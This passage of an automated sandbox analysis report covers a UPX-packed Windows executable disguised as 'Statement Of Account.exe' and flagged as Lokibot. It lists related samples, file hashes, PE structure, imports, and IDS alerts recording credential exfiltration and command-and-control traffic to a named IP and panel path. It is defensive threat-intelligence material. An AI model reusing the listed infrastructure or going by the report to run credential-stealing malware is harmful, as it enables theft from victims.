	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/simple/five/fre.php
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	94.156.177.220/simple/five/fre.php
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	Purchase order.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	dw7h7aQwVZ.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	94.156.177.220
	sample.bin	Get hash	malicious	Okiru	Browse	93.123.85.166
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220

Process:	C:\Users\user\Desktop\Statement Of Account.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.435451661619756
Encrypted:	false
SSDEEP:	3072:5VKJj6Qlh1KyIZDlil59u0sZ+MSRyntsYRHP:WLh1KyIZRmwZ+rRqttRv
MD5:	4C4E8779DF14BB8287343EB1F4C60885
SHA1:	079020FB70857DF5C54E0C99184EE8DA43BFA73A
SHA-256:	13C42508A15724264357244E1107739DB1FB8CA9750461CC657C16A63A2BFA39
SHA-512:	652479EF30C1515760DCE396359EA9F47563D2D4CD487090A7952A7A0013FA5558AF3DCB7352E07568F2722B15E9C572ECA515C964BE2FF25BA1040D7FDF0C02
Malicious:	false
Reputation:	low
Preview:	u..C1YAML1ZC.3G.8LEC2YA.H1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH.ZC8M,.:8.L...@....+Q0.7FW+7"_y",&_57.!VgFM"e*\y....7,\&.J92hEC2YAMH..;..Q...S..W......%......O...(..U.z.....$...^.........U...Z...U......S..k..L..q..Z..[:)..'.C8C3G48L..2Y.LL1.KT.3G48LEC2.ANI:[O8C.F48.MC2YAM..[C8S3G4hMEC2.AMX1ZC:C3B49LEC2YDMI1ZC8C3g>8LAC2YAMH3ZC.C3W48\EC2YQMH!ZC8C3G$8LEC2YAMH1Z..B3#48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3.58.EC2YAMH1ZC8C3G48LEC2YAMH1ZC.7V?@8LE..XAMX1ZC.B3G08LEC2YAMH1ZC8C.G4Xb7'S- MHQ.C8CcF48.EC2e@MH1ZC8C3G48LE.2Y.c,P."8C3cj0LE.3YAOH1Z=9C3G48LEC2YAMHqZC.mKG48LEC2yAMH1PC8c3G4.MEC2YAMH1ZC8C3G48.EC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C3G48LEC2YAMH1ZC8C

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0D7DB7FF842F89A36B58FA2541DE2A6C
SHA1:	50F3B486F99FB22648D26870E7A5CBA01CAED3DA
SHA-256:	140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
SHA-512:	6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...............................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.9463336692016
TrID:	Win32 Executable (generic) a (10002005/4) 94.59% AutoIt3 compiled script executable (510682/80) 4.83% UPX compressed Win32 Executable (30571/9) 0.29% Win32 EXE Yoda's Crypter (26571/9) 0.25% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Statement Of Account.exe
File size:	576'269 bytes
MD5:	8d03a09d0f5d5f2c196be0657d169636
SHA1:	fb44ba8de7862e644239d29343550eb879b25dd8
SHA256:	ac3f8b19b1d29525dddb1d48e4fcf7aec60ea5d93bcf9b874f9a61adde4ca13c
SHA512:	9b18397a013f6913eff43631b295fd3d0a58c06798d8e163f0a0dd8fc96522eec21305247b9e97d74e4aa666421694ef04a4d420cefe6dfbc2d978d460c535cb
SSDEEP:	12288:V9BvctM85t35JPNJj2WzoRLQYRYzmYxU6sDuo88OQQkpG:VD0tM85tbNJjldeYiYxmuo8PWG
TLSH:	A5C42346F184A0FADCEA45B15CD375491ABBDE32393793970339AACFAC78D1060274DA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x4b8b90
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	77b2e5e9b52fbef7638f64ab65f0c58c

Entrypoint Preview

Instruction
pushad
mov esi, 00477000h
lea edi, dword ptr [esi-00076000h]
push edi
jmp 00007F8B80BB8A8Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8B80BB8A6Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F8B80BB8A8Dh
jne 00007F8B80BB8AAAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8B80BB8AA1h
dec eax
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F8B80BB8A56h
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F8B80BB8AD4h
xor ecx, ecx
sub eax, 03h
jc 00007F8B80BB8A93h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F8B80BB8AF7h
sar eax, 1
mov ebp, eax
jmp 00007F8B80BB8A8Dh
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8B80BB8A4Eh
inc ecx
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8B80BB8A40h
add ebx, ebx
jne 00007F8B80BB8A89h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F8B80BB8A71h
jne 00007F8B80BB8A8Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F8B80BB8A66h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F8B80BB8A90h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0038	0x3b0	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb9000	0x7038	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x76000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x77000	0x42000	0x41e00	f914a8d655ae07ad6878d428980d492e	False	0.9933401031783681	data	7.929619295565276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb9000	0x8000	0x7400	375506aad8714493f389985f5be0ee28	False	0.5646214978448276	data	5.905766661808417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xb95cc	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xb96f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xb9824	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xb9950	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xb9fbc	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xba2a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xba3d4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xbb280	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xbbb2c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xbc098	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xbe644	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xbf6f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	1.1375
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	1.0436507936507937
RT_STRING	0xb1c78	0x530	data	English	Great Britain	1.0082831325301205
RT_STRING	0xb21a8	0x690	data	English	Great Britain	1.006547619047619
RT_STRING	0xb2838	0x43a	data	English	Great Britain	1.010166358595194
RT_STRING	0xb2c78	0x5fc	data	English	Great Britain	1.0071801566579635
RT_STRING	0xb3278	0x65c	data	English	Great Britain	1.0067567567567568
RT_STRING	0xb38d8	0x388	data	English	Great Britain	1.0121681415929205
RT_STRING	0xb3c60	0x158	data	English	United States	1.0319767441860466
RT_GROUP_ICON	0xbfb5c	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xbfbe4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xbfbfc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xbfc14	0x14	data	English	Great Britain	1.25
RT_VERSION	0xbfc2c	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xbfdcc	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
MPR.dll	WNetGetConnectionW
ole32.dll	CoInitialize
OLEAUT32.dll	SafeArrayUnaccessData
PSAPI.DLL	EnumProcesses
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	recv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T08:50:12.874031+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:12.874031+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:12.874031+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:13.849294+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:15.023333+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.057099+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.057099+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.063034+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49706	TCP
2024-10-27T08:50:16.345385+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:16.345385+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:16.345385+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.329127+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.329127+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.334761+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49707	TCP
2024-10-27T08:50:17.481650+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:17.481650+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:17.481650+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.456661+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.456661+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.462464+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49708	TCP
2024-10-27T08:50:18.620575+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:18.620575+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:18.620575+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.575558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.575558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.581587+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49711	TCP
2024-10-27T08:50:19.733946+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:19.733946+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:19.733946+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.689379+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.689379+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.695628+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49714	TCP
2024-10-27T08:50:20.863635+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:20.863635+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:20.863635+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.807779+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.807779+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.813380+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49718	TCP
2024-10-27T08:50:21.978873+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:21.978873+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:21.978873+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:22.948231+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:22.948231+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:22.953855+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49720	TCP
2024-10-27T08:50:23.111641+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:23.111641+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:23.111641+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.074551+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.074551+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.080454+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49726	TCP
2024-10-27T08:50:24.282179+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:24.282179+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:24.282179+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.251158+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.251158+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.257092+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49732	TCP
2024-10-27T08:50:25.410505+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:25.410505+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:25.410505+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.359660+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.359660+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.366084+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49742	TCP
2024-10-27T08:50:26.527265+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:26.527265+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:26.527265+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.488642+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.488642+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.494385+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49749	TCP
2024-10-27T08:50:27.675772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:27.675772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:27.675772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.665275+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.665275+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.670968+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49755	TCP
2024-10-27T08:50:28.825870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:28.825870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:28.825870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.791485+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.791485+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.797186+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	49761	TCP
2024-10-27T08:50:29.955586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:29.955586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:29.955586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49771	94.156.177.220	80	TCP
